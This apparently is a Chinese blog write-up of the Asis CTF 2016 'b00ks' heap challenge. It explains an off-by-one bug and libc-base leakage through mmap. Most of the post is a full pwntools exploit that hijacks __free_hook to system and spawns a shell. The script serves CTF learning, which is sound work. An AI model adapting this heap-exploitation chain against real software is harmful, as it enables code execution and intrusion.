[Asis CTF 2016] b00ks

最新推荐文章于 2023-10-02 12:42:32 发布
最新推荐文章于 2023-10-02 12:42:32 发布
阅读量228 收藏
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ethan18/article/details/132036172
版权
文章讲述了在AsisCTF2016中一道关于利用Off-By-One漏洞和mmap内存分配技巧的题目,涉及libc2.23版本的__free_hook利用,以及如何通过修改描述符和地址计算来实现Shellcode注入和控制程序流程。
摘要由CSDN通过智能技术生成

[Asis CTF 2016] b00ks
这道题主要是用到了Off-By-One漏洞,还有利用mmap成立的堆与libc基址间距相等的原理

注意点:

  • 使用的libc最好是2.23版本,因为在libc2.34以后(还是2.35?),__free_hook函数就已经停止利用了,可以利用patchelf来指定可执行文件的libc版本
patchelf --set-interpreter /lib64/ld-2.24.so --set-rpath /home/kali/Desktop/2.24-3ubuntu2.2_amd64 ./b00ks
  • mmap申请的时候尽量往大了申请,我申请的大小是0x21000,结果却并不是mmap开辟空间,而是被存储在了anon_7fd0412c8字段,代表了一个匿名内存映射区域,以下分别是在申请0x21000和0x210000大小时的vmmap情况,当0x210000时才会时mmap申请
    0x21000时
    在这里插入图片描述

本题的exp如下:

from pwn import *
import warnings
warnings.filterwarnings("ignore")
libc = ELF("./libc-2.24.so")

def create_book(book_size,book_name,des_size,des):
    sh.recvuntil(">")
    sh.sendline("1")
    sh.sendlineafter("name size: ",str(book_size))
    sh.sendlineafter(" chars): ",str(book_name))
    sh.sendlineafter("description size: ",str(des_size))
    sh.sendlineafter("description: ",str(des))

def createname(name):
    sh.sendlineafter("name: ",name)

def change_name(name):
    sh.recvuntil("> ")
    sh.sendline("5")
    sh.sendlineafter("name: ",payload)

def show(id):
    sh.recvuntil(">")
    sh.sendline("4")
    sh.readline()
    for i in range(id):
        sh.recvuntil(": ")
        book_name = sh.readline()[:-1]
        sh.recvuntil(": ")
        book_des = sh.readline()[:-1]
        sh.recvuntil(": ")
        book_author = sh.readline()[:-1]
    return book_name,book_des,book_author

def edit_book(des,id):
    sh.recvuntil("> ")
    sh.sendline("3")
    sh.recvuntil("edit: ")
    sh.sendline(str(id))
    sh.sendlineafter("description: ",(des))

def deletebook(book_id):
    sh.readuntil("> ")
    sh.sendline("2")
    sh.readuntil(": ")
    sh.sendline(str(book_id))

sh = process("./b00ks")
payload = "c"*0x20 
createname(payload)


create_book(0xa0,'aaaaa',0x50,'bbbbb')
create_book(0x210000,'/bin/sh',0x210000,'/bin/sh')

book_name,book_des,book_author = show(1)

book_1_addr = (u64(book_author[32:32+6].ljust(8,b"\x00")))
book_2_addr = (u64(book_author[32:32+6].ljust(8,b"\x00")) + 0x30)

print ("struct_book_1_addr is :" + hex(book_1_addr))
print ("struct_book_2_addr is :" + hex(book_2_addr))

payload1 = b"a"*0x30 +p64(1) + p64(book_2_addr+0x8)+p64(book_2_addr+0x10)+p64(0xffff)
edit_book(payload1,1)

change_name(payload)
book_name,book_des,book_author = show(1)

book_2_name_addr = u64(book_name.ljust(8,b"\x00"))
book_2_des_addr = u64(book_des.ljust(8,b"\x00"))

print ("book_2_name_addr is :" + hex(book_2_name_addr))
print ("book_2_des_addr is :" + hex(book_2_des_addr))

libc_base = book_2_name_addr +  0x210FF0
system_addr = libc.sym["system"] + libc_base	
free_hook = libc.sym['__free_hook']+ libc_base

print ("libc_base is :" + hex(libc_base))
print ("system_addr is :" + hex(system_addr))
print ("free_hook is :" + hex(free_hook))
one_gadget = libc_base+ 0xf0897 

edit_book(p64(free_hook),1)
edit_book(p64(system_addr),2)

deletebook(2)
sh.interactive()
ethanyi9
关注
CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
[Asis CTF 2016] b00ks —— Off-By-One笔记与思考
Tokameine的博客
09-13 1389
前言: 这道题做得有点痛苦......因为本地通常都很难和服务器有相同的环境,使用mmap开辟空间造成的偏移会因此而变得麻烦,并且free_hook周围很难伪造chunk,一度显然恐慌...... 不过本来应该很早就开始Off-By-One的学习的,竟然现在才注意到......惭愧 正文: book结构: struct book { int id; char *name; char *description; in...
Asis CTF 2016 b00ks
Bill
04-01 2849
Asis CTF 2016 b00ks 1. 序言   本篇文章是对CTF WIKI Off-By-One漏洞类型的补充. CTF WIKI上面Off-By-One这一章节中两个例子均没有给出相应的EXP, 本次总结将其中一个例子详细分析一下, 希望能够对其他学习者有帮助 2. 程序简介 该程序是一个图书管理系统,可以添加书名,修改作者名以及写备注...
Asis CTF 2016 b00ks(堆溢出NULL byte off-by-one)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-21 1495
Asis CTF 2016 b00ks1.题目获取2.查保护3.分析程序4.地址泄露泄露地址修改地址5.伪造结构体 1.题目获取 题目下载地址:点此下载 2.查保护 3.分析程序 IDA载入,查看main函数 这个函数读取一个名字,最长32个字节。 作者名被读到data段 sub_A89()打印程序功能,并获取用户输入的序号 sub_F55()的功能是添加书籍信息,在这个函数中可以分析到...
asis2016_b00ks --堆的off-by-null
kissyunlei的博客
02-17 588
非常典型的off-by-null题,思路清晰,结构体指向难找,欢迎师傅们来看
ctf大赛题目 格式为图片格式
08-03
### CTF大赛题目分析 #### 一、CTF竞赛背景介绍 CTF(Capture The Flag)是一种网络安全技术比赛形式,在这种比赛中,参赛者通常需要解决一系列由组织者提供的安全挑战来获取分数。这些挑战通常涉及密码学、逆向...
asis2完整版
03-21
asis2完整版】指的是Apache Axis2的完整版本,它是一个高效的、可扩展的Web服务(Web Service)引擎。Apache Axis2是Axis1的下一代产品,专注于提供高性能、灵活且模块化的Web服务解决方案。 Web服务是一种通过...
ASIS for GNAT-开源
05-15
ASIS 本身是 ISO / IEC 15291:1999 国际标准,确保了不同实现之间的兼容性,使得开发者可以编写一次工具,然后在遵循 ASIS 标准的不同 Ada 编译器上运行。这一标准的制定,极大地促进了 Ada 开发环境的生态系统发展...
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库.docx
07-05
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库
[PWN] BUUCTF asis2016_b00ks Offbynull利用
LDX的博客
10-02 201
堆 Offbyone 劫持free_hook
off by one --- Asis CTF 2016 b00ks题解
coco的博客
11-18 614
确定漏洞点 首先,checksec查看开了哪些保护,其中PIE会使我们的调试难度稍稍增加。 再执行程序之后是一个经典的菜单选择,可以大概判断是与堆的利用有关。 通过用ida反编译之后查看,发现有一个关于读的函数会多读入一个\x00,造成了一个null off by one的漏洞。 程序分析 create 函数 创建了book name的堆 创建了book description的堆 创建了b...
Asis CTF 2016——b00ks
04-18 385
这程序是一个图书管理系统  #off-by-one 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 struct _IO_FILE *v3; // rdi 4 __int64 savedregs; // [rsp+20h] [rbp+0h] 5 6 ...
OFF BY ONE AsisCTF2016b00ks
Grxer的博客
03-20 122
题目链接:https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/off_by_one/Asis_2016_b00ksmore有漏洞会多读取一个字节的/x00author name存放在unk_202040+pie处,32个字节分析后可以推断出book结构体是如下的,而且在unk_202060+pie处开始存放结构体指针,我们可以进行一个字节的溢出,来控制book1的最低位地址。
Off-By-One Asis CTF 2016 b00ks
qq_39153421的博客
03-09 632
Off-By-One学习、练习0x1、Off-By-One原理0x2、Asis CTF 2016 b00ks1、利用流程:2、泄露过程a、输入用户名,泄露book1地址b、构造假的fake_book结构体,使其指向book2的name和description字段。c、修改book1的描述字段,填入fake_book,输出book,得到book2的name和description地址。d、根据book2的name字段(为什么要是这个字段呢?)由固定偏移计算libcbasee、根据libcbase得到syste
asis2016_b00ks
z1r0的博客
03-21 573
asis2016_b00ks 查看保护 这个看上去很正常,跟进一下read_input 可以看到一个off-by-null漏洞。 这里的作者的名字和heap_ptr贴在了一起 攻击思路:一个off-by-null,看一下可不可以从author_addr这里入手 因为heap_ptr和author_addr贴在了一起,而read_input有一个off-by-null,可以通过change_author_name来使得heap_ptr低一字节被改在\x00。这里还有一个知识点,一开始输入0x20个数
buu刷题日记 asis2016_b00ks
qq_51474381的博客
05-18 561
1.漏洞点 一个off by null,但和其他堆题的利用不太一样。 输入name时可覆盖heaplist的最低位为0 2.利用思路 1.泄露heap地址 申请大的heap再free掉,show功能正常,直接泄露。 2.泄露libc && 改__free_hook heaplist的第一个指针最低位可覆盖为0,在对应位置伪造结构体,再结合edit和show功能实现任意读写,改freehook为system。 3.shell 申请时写入‘/bin/sh\x00’再
ASIS+Quals
最新发布
10-18
ASIS是Ada语义接口规范,它是已发布的国际ISO标准(ISO / IEC 15291:1999)。它提供了一种机制,使得可以在Ada程序中访问和操作程序的语法和语义信息。ASIS可以用于许多应用程序,例如代码分析、代码转换、代码生成和代码重构。而Quals是一种基于ASIS的工具,它可以用于静态代码分析和漏洞检测。Quals可以帮助开发人员发现和修复代码中的安全漏洞,从而提高软件的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值